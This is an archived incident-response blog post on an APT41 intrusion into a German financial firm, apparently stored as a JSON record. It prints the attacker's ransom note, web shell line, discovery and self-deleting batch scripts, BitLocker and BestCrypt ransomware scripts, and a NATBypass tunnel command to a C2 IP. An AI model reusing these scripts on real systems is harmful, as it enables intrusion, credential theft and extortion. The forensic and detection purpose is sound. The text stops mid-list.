{ "id": "574de0e9-9963-46aa-8164-44097c584599", "created_at": "2026-04-06T00:10:48.818946Z", "updated_at": "2026-04-10T13:12:07.460915Z", "deleted_at": null, "sha1_hash": "6767fd3af527538ea0892fb48215fc6b1a17fc1d", "title": "APT41 — The spy who failed to encrypt me", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1520389, "plain_text": "APT41 — The spy who failed to encrypt me\r\nBy DCSO CyTec Blog\r\nPublished: 2023-01-30 · Archived: 2026-04-05 23:50:42 UTC\r\n18 min read\r\nDec 24, 2022\r\nThis blog post is based on our recent investigation into one of APT41’s operations against an unnamed German\r\ncompany from the financial sector. The company contacted us in March 2022 after discovering a ransom note (as\r\npresented below) on several of its servers. The threat actor tried to encrypt multiple workstations in the client’s\r\nenvironment which was thwarted by Microsoft Defender for Endpoint (MDE). As part of this incident response\r\nengagement DCSO’s Incident Response Team (DIRT) supported the client in determining the scope of the\r\nincident, identifying the initial attack vector and providing remediation support.\r\nHello. All your servers are encrypted.\r\nPlease contact: KalajaTomorr@ctemplar.com\r\nspare email: KalajaTomorr@firemail.cc\r\nYour identity code: ************\r\nContact us to get the decryption method. You can first understand how to buy Bitcoin and pay.\r\nOnly we can decrypt, please do not believe any decryption tool. Your recovery method will cause data\r\nto be destroyed and irreversible.\r\nDuring this incident response engagement DIRT performed a forensic analysis of multiple servers and\r\nworkstations which allowed us to determine that:\r\nThe initial attack vector was a vulnerable “Microsoft Exchange Server”, that was compromised with the\r\nhelp of the“ProxyLogon” exploit.\r\nThe threat actor used a “China Chopper” web shell to persist on the compromised “Microsoft Exchange\r\nServer”.\r\nThe threat actor laterally moved from the patient zero to a domain controller after performing initial\r\ncredential dumping activities.\r\nThe threat actor used a second domain controller as a “base” to stage his encryption attack against\r\nworkstations and servers in the environment.\r\nThe threat actor used “Jetico’s BestCrypt” for server encryption and “Microsoft Bitlocker” for the\r\nencryption of workstation.\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 1 of 19\n\nThe threat actor accessed compromised systems through RDP by exposing the RDP port to the internet\r\nwith the help of “NATBypass”.\r\nMerry Xmas and a Happy New Year from Denis Szadkowski, Johann Aydinbas, Hendrik Bäcker and Jiro Minier.\r\nTimeline\r\nPress enter or click to view image in full size\r\nSimplified Timeline of Security Incident (Timestamps in UTC)\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 2 of 19\n\nInitial Access\r\nThe threat actor gained initial access in March 2021 by exploiting a chain of vulnerabilities known as\r\n“ProxyLogon” ( CVE-2021–26855 , CVE-2021–27065 ). During the forensic examination of the affected system,\r\nDIRT found the typical signs of “ProxyLogon” exploitation, which are the execution of the PowerShell Cmdlets\r\nSet-OabVirtualDirectory , Remove-OabVirtualDirectory and New-OabVirtualDirectory . Those events were\r\nretrieved from the MSExchange Management log (Event ID 1). By exploiting the “ProxyLogon” vulnerability the\r\nthreat actor was able to drop a “China Chopper” web shell supp0rt.aspx on the client’s exchange server:\r\nC:\\inetpub\\wwwroot\\aspnet_client\\supp0rt.aspx\r\nThe contents of the web shell are presented below:\r\n\u003cscript language=\"JScript\" runat=\"server\"\u003efunction Page_Load(){eval(System.Text.Encoding.UTF8.GetStri\r\nSecond Appearance\r\nAfter a year of inactivity the threat actor returned in March 2022 to further penetrate into the compromised\r\nnetwork. In the meanwhile, the client’s Exchange Server has been fully patched. Unfortunately, the client forgot to\r\nremove the already existing web shell before applying security patches which enabled the threat actor to return a\r\nyear later.\r\nThe first post-exploitation activity that the threat actor conducted on the compromised Exchange Server was to\r\nupload SysInternal’s “Procdump” ( procdump64.exe ) and “NATBypass” ( na.exe ) to the staging directory\r\naspnet_client . Shortly after completing the upload the threat actor used “Procdump” to perform credential\r\ndumping activities. DIRT found a corresponding Amcache entry that proves the execution of “Procdump”.\r\nAdditionally, the registry key EulaAccepted was set on the Exchange server which is an indicator of the usage of\r\nSysInternal’s “Procdump”.\r\nOne interesting detail to note about the tool uploads is that certain tools like for example “NATBypass” ( na.exe )\r\nwere uploaded in cabinet archives. This behavior was repeated during the discovery stage of the attack in which\r\nthe threat actor collected the outputs of his discovery scripts in cabinet archives.\r\n$ file na\r\nna: Microsoft Cabinet archive data, Windows 2000/XP setup, 979933 bytes, 1 file, at 0x2c +A \"na.exe\"\r\nPrivilege Escalation\r\nAs described in the section “Initial Access”, the patient zero system showed signs of “ProxyLogon” exploitation.\r\nIn fact DIRT was able to confirm the exploitation by reviewing the exchange server logs of the affected system.\r\n“ProxyLogon” allows the attacker to drop a web shell into a publicly accessible web path of a vulnerable\r\nExchange server that subsequently serves as persistent backdoor. Additionally, the web shell is executed with the\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 3 of 19\n\nprivileges of the account used to run the application pool of the IIS server. By default this is NT\r\nAuthority\\SYSTEM , which was also the case for our client.\r\nTherefore, by exploiting “ProxyLogon” to drop a web shell, the attacker can easily gain SYSTEM privileges and\r\nachieve persistence on the target system.\r\nDefensive Evasion\r\nThe threat actor didn’t use any sophisticated techniques to avoid detection or to bypass security products. But\r\nsometimes simplicity can be the ultimate sophistication. DIRT observed that the threat actor relied on three types\r\nof tools: Already present tools, custom tools and commercial off-the-shelf tools. Additionally, the threat actor\r\nshowed some routine in deleting his tools in order to hinder forensic analysis.\r\nOne thing that DIRT observed was that the batch-scripts used by the threat actor always contained a line of code to\r\ndelete the batch script itself and it’s outputs:\r\nT1070.004:\r\ndel *.txt \u0026 del *.bat \u0026del *.log\u0026del setup.*\u0026del *.bat\r\nAnother technique that was observed by DIRT during this intrusion is falling into the category of “Living of the\r\nLand” in which the threat actor leverages already existing tools present in the target environment.\r\nIn this case the threat actor leveraged Microsoft BitLocker to for the encryption of workstations. This approach\r\nprovides the benefit that no development costs need to be spend on custom ransomware, instead the already\r\npresent Microsft BitLocker is used to achieve encryption. Furthermore, the usage of Microsoft BitLocker is not\r\nunusual in corporate environments which makes detection more challenging.\r\nIn addition to living-of-the-land tools, the threat actor used commercial, off-the-shelf encryption software Jetico\r\nBestCrypt for server encryption purposes. One might argue that using this software (which is digital signed by\r\n“Jetico Inc. Oy”) allowed the threat actor to stay under the radar. From a threat actors perspective commercial, off-the-shelf encryption software like Jetico BestCrypt has the potential to be misused as ransomware that is digital\r\nsigned and trusted by anti-virus vendors.\r\nCredential Access\r\nThe first post-exploitation activities that the threat actor performed after compromising the patient zero system\r\nwas to upload several tools like for example “Procdump” and “NATBypass” to the staging directory\r\naspnet_client . Next the threat actor used “Procdump” to create a memory dump of the LSASS process. DIRT\r\nfound a corresponding Amcache entry that proves the the execution of “Procdump”. In addition to that the\r\nregistry key EulaAccepted was set which is related to the usage of the argument -accepteula which was\r\nsupplied during the execution of procdump64.exe .\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 4 of 19\n\nForensic Artifacts — Credential Access\r\nLast but not least DIRT found forensic evidence of execution that shows that the threat actor used a tool called\r\nC:\\PerfLogs\\secretsdump.exe on one of the domain controllers in the compromised environment. By looking\r\nup the hash on VirusTotal we were able to confirm that secretsdump.exe is the “PyInstaller” version of\r\nImpacket’s secretsdump.py .\r\nThe threat actor leveraged the tool to create a LSA secrets dump hashes.txt and store its contents in the staging\r\ndirectory C:\\PerfLogs\\ .\r\nThe credential access activities performed by the threat actor resulted in the exposure of the credentials of two\r\ndomain administrator accounts from different domains within the client’s active directory forest.\r\nThose credentials were subsequently used for lateral movement purposes.\r\nDiscovery\r\nDIRT observed that during the post-exploitation stage of the attack the threat actor conducted extensive discovery\r\nactivities, that were aimed at identifying suitable targets for encryption purposes. The following code listing shows\r\nthe contents of the batch script C:\\PerfLogs\\cmd-webshell.txt which was obtained from a compromised\r\ndomain controller.\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 5 of 19\n\n@echo off\r\nset dir1=\\perflogs\r\nmkdir %dir1%\r\ncd %dir1%\r\ndel *.txt \u0026del *.log\r\nnet time /domain \u003e%dir1%\\info.txt\r\nwhoami \u003e\u003e%dir1%\\info.txt\r\nipconfig /all \u003e\u003e%dir1%\\info.txt\r\nnet group \"domain admins\" /domain\u003e\u003e%dir1%\\info.txt\r\ndsquery server \u003e\u003e%dir1%\\info.txt\r\nnltest /domain_trusts /all_trusts \u003e\u003e%dir1%\\info.txt\r\nwmic /namespace:\\\\root\\securitycenter2 dir1 antivirusproduct get displayname,productstate,dir1tosigne\r\ndsquery * -limit 0 -filter \"(\u0026(objectCategory=computer)(objectClass=computer))\" -attr cn operatingSys\r\nfindstr -c:\"Windows Server\" computers.txt \u003eserver.txt\r\nfindstr -c:\"Windows 10\" computers.txt \u003eWin10.txt\r\nfor /f \"tokens=1*\" %%a in (server.txt) do echo %%a\u003e\u003eip.txt\r\np.exe \u0026 rename o.txt Server-ping.txt \u0026del ip.txt\r\nfor /f \"tokens=1*\" %%a in (Win10.txt) do echo %%a\u003e\u003eip.txt\r\np.exe \u0026 rename o.txt Win10-ping.txt \u0026del ip.txt\r\ndel p.exe \u0026del server.txt \u0026del Win10.txt\r\nfind /i /c \" \" Win10-ping.txt\r\nfind /i /c \" \" Server-ping.txt\r\nfindstr /c:\"NT 5\" info.txt\r\necho computers.txt\u003elist.txt\u0026echo info.txt\u003e\u003elist.txt\u0026echo Server-ping.txt\u003e\u003elist.txt\u0026echo Win10-ping.tx\r\nmakecab /f list.txt /d maxdisksize=1001024000\r\necho \"finish!!!\"\r\ndel *.txt \u0026 del *.bat \u0026del *.log\u0026del setup.*\u0026del *.bat\r\nThe script runs multiple tools/commands to gather information about the compromised system and it’s\r\nenvironment. Most of the commands are built-in tools shipped with Microsoft Windows. But there is one\r\nexception, a tool named p.exe . This custom tool is known as “MiPing”. It can be described as a threaded\r\n“pinger” used to discover active systems within the compromised environment. It takes a list of IP addresses in the\r\nform of a text file named ip.txt and then returns a file named o.txt that contains information about the\r\navailability of the systems previously specified in the text file ip.txt . “MiPing” was first discovered by\r\nLIFARS and described in their report “APT41 — The Spy Who Encrypted Me”. The report links “MiPing” to an\r\nintrusion conducted by APT41. The investigation results led to a criminal indictment of seven defendants by the\r\nUS Department of Justice.\r\nAnother notable detail about the discovery script is that it distinguishes between workstations ( Win10-ping.txt )\r\nand servers ( Server-ping.txt ). This distinction is relevant because the threat actor uses a different encryption\r\ntechnique depending on whether the target system is a workstation or server. DIRT observed that the threat actor\r\nused “Jetico BestCrypt” for the encryption of servers and “Microsoft BitLocker” for the encryption of\r\nworkstations. This observation was also made by SYNACKTIV in their “Unransomware” blog post which details\r\na similar intrusion.\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 6 of 19\n\nAfter the execution of all discovery commands their outputs are stored in individual text files, which then are\r\ncombined into a single text file called C:\\PerfLogs\\list.txt . In the end the single text file gets archived with\r\nthe makecab.exe utility. This collection behavior was also observed by Cybereason’s Incident Response Team as\r\ndescribed in their blog post “Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques”.\r\nA final thing to note is that at times the threat actor executed the discovery commands presented in the script\r\nmanually, which failed on multiple occasions because of typos. During the forensic analysis DIRT examined the\r\nRDP Bitmap Cache belonging to one of the compromised domain administrator accounts and the following\r\nexecution of nltest.exe was spotted:\r\nPress enter or click to view image in full size\r\nRDP Bitmap Cache — Manual Discovery Activities\r\nLateral Movement\r\nAfter compromising the patient zero system (Exchange server) the threat actor moved laterally to a neighboring\r\ndomain controller (DCs) by leveraging the Remote Desktop Protocol (RDP) and the previously dumped domain\r\nadministrator credentials. Subsequently, the compromised DCs were used as a “base” to initiate encryption\r\nactivities on workstations and servers in the environment. The threat actor used network shares and the Server\r\nMessage Block (SMB) protocol to copy batch scripts to target systems and then execute them through Windows\r\nManagement Instrumentation (WMI). The following listing shows an abstraction of the techniques leveraged by\r\nthe threat actor:\r\nT1021.002:\r\ncopy \"[FILE]\" \\\\[TARGET]\\c$\\ /y\r\nT1021.003:\r\nfor /f %%y in ([TARGETS]) do wmic /failfast:10000 /node:\"%%y\" /USER:\"DOMAIN\\administrator\" /PASSWORD\r\nCollection\r\nThe threat actor performed collection activities with the help of a built-in Microsoft Windows tool named\r\nmakecab.exe . This tool is used to create cabinet archives. During our investigation we found evidence for the\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 7 of 19\n\nusage of makecab.exe and the execution of the following command line:\r\nT1560.001:\r\nmakecab /f \u003cSOMEFILE\u003e /d maxdisksize=1001024000\r\nThe threat actor also used cabinet archives for bringing his own tools on compromised systems e.g., the tool\r\n“NATBypass” ( na.exe ) was uploaded in the form of an cabinet archive named na .\r\n$ file na\r\nna: Microsoft Cabinet archive data, Windows 2000/XP setup, 979933 bytes, 1 file, at 0x2c +A \"na.exe\"\r\nCommand and Control\r\nThe threat actor accessed compromised servers directly from the internet through RDP. This was accomplished by\r\nexposing the local RDP ports of compromised systems to the internet with the help of a tool called NATBypass\r\n( na.exe ). Since the threat actor was heavily relying on RDP for command and control, DIRT spend some time to\r\nexamine the RDP Bitmap Cache associated with the domain administrator account that was used during the\r\nintrusion. This revealed the command line below which was used to forward the local RDP port from the\r\ncompromised internal server to the threat actor’s command and control (C2) server:\r\nna.exe -slave 127.0.0.1:3389 185.23.214.111:10001\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 8 of 19\n\nNATBypass — RDP BitmapCache\r\nAfter running the above command, a reverse tunnel is established from the compromised server to the attacker\r\ncontrolled machine on the internet ( 185.23.214.111 ). Eventually, the RDP port 3389 of the compromised\r\ninternal server can be accessed interactively through RDP by connecting to 185.23.214.111 on port 10001 .\r\nThis technique allows the threat actor to bypass firewall restrictions that usually prevent inbound RDP connections\r\nfrom the internet. The following figure summarizes the previously described technique that the threat actor used\r\nfor accessing the client’s domain controller through RDP:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 9 of 19\n\nNATBypass — Forwarding RDP\nOne interesting detail that DIRT noticed during the forensic analysis was that each time the threat actor accessed\nservers through the forwarded RDP port two types of terminal service related events ( 24 and 25 ) were\ngenerated on the destination systems. Those particular events all had in common that the contained source address\nof the RDP session was 127.0.0.1 . This is the case because the RDP connection is originating from the\npreviously established tunnel and therefore the RDP services logs it as a local connection.\n23324Microsoft-Windows-TerminalServices-LocalSessionManager/OperationalDC.company.corpDOMAIN\\administrator2 https://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\nPage 10 of 19\n\n\u003cAddress\u003e127.0.0.1\u003c/Address\u003e\r\n \u003c/EventXML\u003e\r\n \u003c/UserData\u003e\r\n\u003c/Event\u003e\r\nThe investigation of the IP ( 185.23.214.111 ) used by the threat actor revealed that at some point in time the\r\nsystem was used as a Cobalt Strike Team Server. Unfortunately, at the time of investigation the team server didn’t\r\nserve Cobalt Strike beacons anymore. DIRT spent extensive time reviewing the collected evidence to see if there\r\nwere any indicators that would prove that Cobalt Strike was used during the intrusion. But no such evidence could\r\nbe found.\r\nCobalt Strike Server identified by Twitter user @drb_ra\r\nImpact\r\nDuring the forensic analysis of one of the affected domain controllers (DC) in the client’s environment we found\r\nthat the threat actor was using the DC as a “base” to launch the encryption of neighboring servers. As DIRT\r\nexamined the DC, a directory named C:\\tools\\ was found that contained a bunch of batch-scripts and the sub-directory crypt . The purpose of the batch-scripts was to perform some preparation tasks before initiating the\r\nencryption of the target systems. The code listing below shows the contents of the batch script 1.bat that was\r\nfound in the mentioned directory:\r\nfor /f %%i in (address.txt) do start /b xcopy \"c:\\tools\\crypt\" \\\\%%i\\c$\\crypt\\ /e /y /h\r\nfor /f %%i in (address.txt) do start /b copy \"c:\\tools\\Readme.txt\" \\\\%%i\\c$\\ /y\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 11 of 19\n\nfor /f %%i in (address.txt) do start /b copy \"c:\\tools\\copy.txt\" \\\\%%i\\c$\\windows\\copys.bat /y\r\nThe script 1.bat consists of three for-loops that uses the built-in Microsoft Windows tools copy and xcopy to\r\nmove some files from the staging directory of the DC to the encryption targets specified in the text file\r\naddress.txt . The first for-loop is responsible for copying a tool named “Jetico BestCrypt” which is located in\r\nthe directory C:\\tools\\crypt . “Jetico BestCrypt” is a commercial, off-the-shelf application that is able to\r\nencrypt disk volumes or individual files. APT41 has a track record of using “Jetico BestCrypt” which has been\r\nbeen documented by LIFARS in their APT41 report “The Spy Who Encrypted Me”. Throughout our investigation\r\nwe noticed that the threat actor used “Jetico BestCrypt” exclusively for the encryption of servers. For the\r\nencryption of workstations the threat actor relied on Microsoft BitLocker.\r\nGet DCSO CyTec Blog’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nThe purpose of the second for-loop is to copy the ransom note Readme.txt from the staging directory on the DC\r\nto the root of the C:\\ volume on the target servers. After the ransom note has been placed on the target servers\r\nthe third for-loop copies a batch script named copys.bat to the directory C:\\Windows\\ on the target server. In\r\nthe following code listing the contents of the batch-script C:\\Windows\\copys.bat are presented which were\r\nobtained from one of the target servers:\r\ncopy \"c:\\Readme.txt\" \"c:\\Documents and Settings\\All Users\\desktop\\Readme 1.txt\" /y\r\n[...]\r\ncopy \"c:\\Readme.txt\" \"c:\\Documents and Settings\\All Users\\desktop\\Readme 9.txt\" /y\r\ncopy \"c:\\Readme.txt\" \"c:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\Readme.txt\" /y\r\ncopy \"c:\\Readme.txt\" \"c:\\users\\public\\desktop\\Readme 1.txt\" /y\r\n[...]\r\ncopy \"c:\\Readme.txt\" \"c:\\users\\public\\desktop\\Readme 9.txt\" /y\r\ncopy \"c:\\Readme.txt\" \"c:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Readme.txt\" /y\r\nfor /L %%i in (1,1,100) do copy \"C:\\Readme.txt\" \"C:\\Users\\Public\\Desktop\\Readme %%i.txt\" /y\r\nshutdown -r -t 30 -f\r\nThe batch script copys.bat is responsible for copying the ransom note from the root of the C:\\ volume to\r\ndifferent paths on the target server. Subsequently, the batch script copys.bat is executed with the help of another\r\nbatch script named end.bat which again was located in the staging directory on the DC. The code listing below\r\nshows the contents of end.bat :\r\nfor /f %%y in (address.txt) do wmic /failfast:10000 /node:\"%%y\" /USER:\"DOMAIN\\administrator\" /PASSWOR\r\nAs can be seen from the code listing above the threat actor used wmic.exe and a domain administrator account to\r\nexecute the batch script copys.bat on the target servers.\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 12 of 19\n\nAfter transferring “Jetico BestCrypt” and a ransom note to the target system, the threat actor used RDP to connect\r\nto the servers and then execute “Jetico BestCrypt” to perform the encryption. The process of encrypting server\r\nsystems is summarized in the following graphic:\r\nPress enter or click to view image in full size\r\nDistribution of Jetico BestCrypt\r\nAs previously mentioned the server encryption was performed in a slightly different way compared to the\r\nencryption of workstations. Instead of using “Jetico BestCrypt” the threat actor leveraged the built-in tool\r\nMicrosoft BitLocker and a couple of batch scripts to automate the process. The code listing below shows the\r\ncontents of the batch script C:\\WINDOWS\\test.bat , which was previously copied to the workstation from one of\r\nthe DCs.\r\nThe batch script is responsible for enabling BitLocker encryption for all the volumes present in workstation. In\r\nfact the file test.bat is unique for each workstation and contains a different BitLocker recovery password.\r\nreg delete HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE /f\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v EnableBDEWithNoTPM /t REG_DWORD /d \"0\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 13 of 19\n\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v UseAdvancedStartup /t REG_DWORD /d \"0\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v RecoveryKeyMessage /t REG_SZ /d \"Что\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v RecoveryKeyMessageSource /t REG_DWORD\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v RecoveryKeyUrl /t REG_SZ /d \"\" /f\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v ActiveDirectoryBackup /t REG_DWORD /d\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v ActiveDirectoryInfoToStore /t REG_DWO\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v RequireActiveDirectoryBackup /t REG_D\r\nCScript //H:CScript //S\r\nmanage-bde -on A: -rp 366872–032054–377806–330154–718707–337205–661793–443619 -UsedSpaceOnly -sk C:\\\r\n[...]\r\nmanage-bde -on Z: -rp 366872–032054–377806–330154–718707–337205–661793–443619 -UsedSpaceOnly -sk C:\\\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v UseTPM /t REG_DWORD /d \"0x02\" /f\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v UseTPMPIN /t REG_DWORD /d \"0x00\" /f\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v UseTPMKey /t REG_DWORD /d \"0x01\" /f\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\FVE\" /v UseTPMKeyPIN /t REG_DWORD /d \"0x00\" /\r\nmanage-bde -protectors -add C: -TPMAndStartupKey C:\\\r\nattrib -s -h C:\\*.BEK\r\ndel C:\\*.BEK /f /q\r\nmanage-bde -status \u003e C:\\[IP].txt\r\nshutdown /r /t 1800 /f\r\ndel C:\\Windows\\test.bat /f /q\r\nBesides the test.bat batch-script we found numerous other references of batch scripts in the UsnJrnl of the\r\nDC.\r\n2022-03-07 10:22:59.480516 | 1.bat | ARCHIVE | BASIC_INFO_CHANGE CLOSE\r\n2022-03-07 10:22:59.770462 | 192.168.0.1.bat | ARCHIVE | FILE_CREATE\r\n2022-03-07 10:22:59.790461 | 192.168.0.2.bat | ARCHIVE | DATA_EXTEND FILE_CREATE\r\n[...]\r\n2022–03–07 10:39:18.934895 | 192.168.0.100.bat | ARCHIVE | FILE_DELETE CLOSE\r\n2022–03–07 10:39:18.934895 | getstatus.bat | ARCHIVE | FILE_DELETE CLOSE\r\n2022–03–07 10:39:18.934895 | lock.bat | ARCHIVE | FILE_DELETE CLOSE\r\n2022–03–07 10:40:06.341251 | end.bat | ARCHIVE | DATA_OVERWRITE DATA_EXTEND\r\nThe first batch script in the UsnJrnl excerpt above is 1.bat . It was used by the threat actor to move the batch-scripts C:\\\\bitlocker\\cmd\\[IP].bat to the directory C:\\WINDOWS\\test.bat on the target workstation. It’s\r\ncontents are presented below:\r\nfor /f %%i in (ip.txt) do copy \"c:\\\\bitlocker\\cmd\\%%i.bat\" \\\\%%i\\c$\\WINDOWS\\test.bat /y\r\nAs soon as the [IP].bat file was transferred from the DC to all workstations in the environment the threat actor\r\nexecuted a batch-script named lock.bat . The purpose of lock.bat was to execute test.bat with the help of\r\nWMIC and the previously obtained domain administrator credentials. Luckily, for the customer Microsoft\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 14 of 19\n\nDefender for Endpoint detected C:\\WINDOWS\\test.bat as Ransom:BAT/BLJammer.A!dha and prevented it’s\r\nexecution, which thwarted the encryption.\r\nfor /f %%i in (ip.txt) do wmic /node:\"%%i\" /USER:\"DOMAIN\\administrator\" /PASSWORD:\"XXXXXXXXX\" process\r\nFurthermore, DIRT found another batch-script named getstatus.bat that would have allowed the threat actor to\r\ncollect a file C:\\[IP].txt from all workstations. The file C:\\[IP].txt contains the status of Microsoft\r\nBitLocker encryption upon successful execution of test.bat .\r\nfor /f %%i in (ip.txt) do copy \\\\%%i\\C$\\%%i.txt C:\\\\bitlocker\\status\\\r\nMiPing Technical Analysis\r\nMiPing, first described by LIFARS in their “APT41 — The Spy Who Encrypted Me” paper, is a custom multi-threaded connection tester. It takes a line-based file of hostnames named ip.txt as input and records the result\r\nof its testing in a file named o.txt\r\nTo determine reachability, MiPing initially attempts to ping each host (ICMP ECHO) while recording successes in\r\nthe output file. In the event that no ping response is received, MiPing proceeds to iterate through a list of 4\r\nhardcoded ports (445, 135, 22 and 80) and attempts to connect to each. If any connection succeeds, the host is also\r\nrecorded as reachable in the output file.\r\nPress enter or click to view image in full size\r\nMiPing attempting to connect on hardcoded ports after pinging failed\r\nICMP ECHO packets generated by MiPing contain a custom hardcoded payload Data Buffer :\r\nPress enter or click to view image in full size\r\nHardcoded ICMP ECHO payload\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 15 of 19\n\nOur testing however showed that the payload is not suitable for network signature generation, as the same payload\r\nstring appears to be used in commercial software, including games.\r\nMiPing also offers command line switches to influence its behavior:\r\n-m \u003ctimeout\u003e can be used to change network timeouts\r\n-t \u003cnum\u003e can be used to change the number of threads to use\r\nSimilarities With Publicly Disclosed Attacks\r\nThe tactics, techniques and procedures (TTPs) observed in this case align with several publicly disclosed security\r\nincidents that were attributed to APT41 with medium-high confidence. The most noteworthy publications that\r\nsupport this attribution claim are:\r\nThe Spy Who Encrypted Me — LIFARS\r\nRansomware as a tool for diversion and coverup. A possible modus operandi for advanced persistent\r\nthreats? — Raphael Enio Hoheisel\r\nGood for Evil: DeepBlueMagic Ransomware Group Abuses Legit Encryption Tools — Varonis\r\nSuspected Chinese hackers behind attacks on ten Israeli hospitals — Bleeping\r\nDisrupting an Active Ransomware Attack Over the Course of Hours — eSentire\r\nDeepBlueMagic Ransomware: APT41’s arsenal? — Medium\r\nUNRANSOMWARE — SYNACKTIV\r\nThe publicly disclosed security incidents referenced in this article all have in common, that the threat actor\r\nleveraged Jetico BestCrypt and Microsoft BitLocker to encrypt compromised systems. Additionally, the ransom\r\nnotes discovered as part of the security incident all follow the same format. Furthermore, in all observed cases the\r\nthreat actors relied on batch scripts for discovery purposes and to facilitate the encryption of systems.\r\nIoCs\r\nNATBypass (na.exe):\r\n4550635143c9997d5499d1d4a4c860126ee9299311fed0f85df9bb304dca81ff\r\nNATBypass Cabinet Archive (na):\r\ne518b80316bf1c349943040e4d26401958846c2596e58f1c98be835ecf29b381\r\nBitlocker encryption batch-script (test.bat):\r\n7b4f69b00d72fac3ed2c0b25d424f013f96537c563906b782742da15c72e9147\r\nBitlocker encryption prep batch-script (copys.bat):\r\n180efca9b5560e02f957f49f0b272339561483232adf0714021d6b32b737e707\r\nDistribute Jetico BestCrypt batch-script (1.bat):\r\n011e9aaa6251db149d1693c02a8c6407012520fb9b2f8f47e64b897017c0e673\r\nExecute bitlocker encryption batch-script (end.bat):\r\n28be4681480932361d75cfc360baf2c8c6d13b28d019e3dd053184894b994ef3\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 16 of 19\n\nMiPing (p.exe):\r\n806761850d19f0cc9f41618e74db471e85c494e952f900f827c1779f2d1c4d31\r\nDiscovery batch-script (cmd-webshell.txt):\r\nbc20f4c28cbdf38eba69eb144a89c20c162481955d4cff8bdf02ba9644865523\r\nChina Chopper Web Shell (supp0rt.aspx):\r\n367b8052db12cb9ddce01275fc213480831dc5fe9aa3da64fecc2360267905a0\r\nJetico BestCrypt (bcfmgr.exe):\r\n0a560fa01d6e4eb30fe35be3b07e8024df212840d188bea1b2c047a6f0ffe2af\r\nC2 IP:\r\n185.23.214.111\r\nFiles and Paths:\r\nC:\\inetpub\\wwwroot\\aspnet_client\\supp0rt.aspx\r\nSYSVOL\\_BAD_crypt\\bcfmgr.exe\r\nC:\\inetpub\\wwwroot\\aspnet_client\\Procdump.exe\r\nC:\\inetpub\\wwwroot\\aspnet_client\\Procdump64.exe\r\nC:\\inetpub\\wwwroot\\aspnet_client\\na.exe\r\nC:\\PerfLogs\\secretsdump.exe\r\nC:\\PerfLogs\\hashes.txt\r\nC:\\Windows\\copys.bat\r\nC:\\tools\\crypt\\x64\\bcfnt.sys\r\nC:\\Readme.txt\r\nC:\\tools\\disk.txt\r\nC:\\PerfLogs\\1.bat\r\nC:\\tools\\1.bat\r\nC:\\tools\\address.txt\r\nC:\\tools\\end.bat\r\nC:\\tools\\crypt\\bcfmgr.exe\r\nC:\\tools\\copy.txt\r\nC:\\PerfLogs\\cmd-webshell.txt\r\nC:\\PerfLogs\\p.exe\r\nMicrosoft Defender for Endpoint Signature:\r\nRansom:BAT/BLJammer.A!dha\r\nMITRE ATT\u0026CK\r\nT1003.001: OS Credential Dumping: LSASS Memory\r\nT1003.004: OS Credential Dumping: LSA Secrets\r\nT1018: Remote System Discovery\r\nT1021.001: Remote Services: Remote 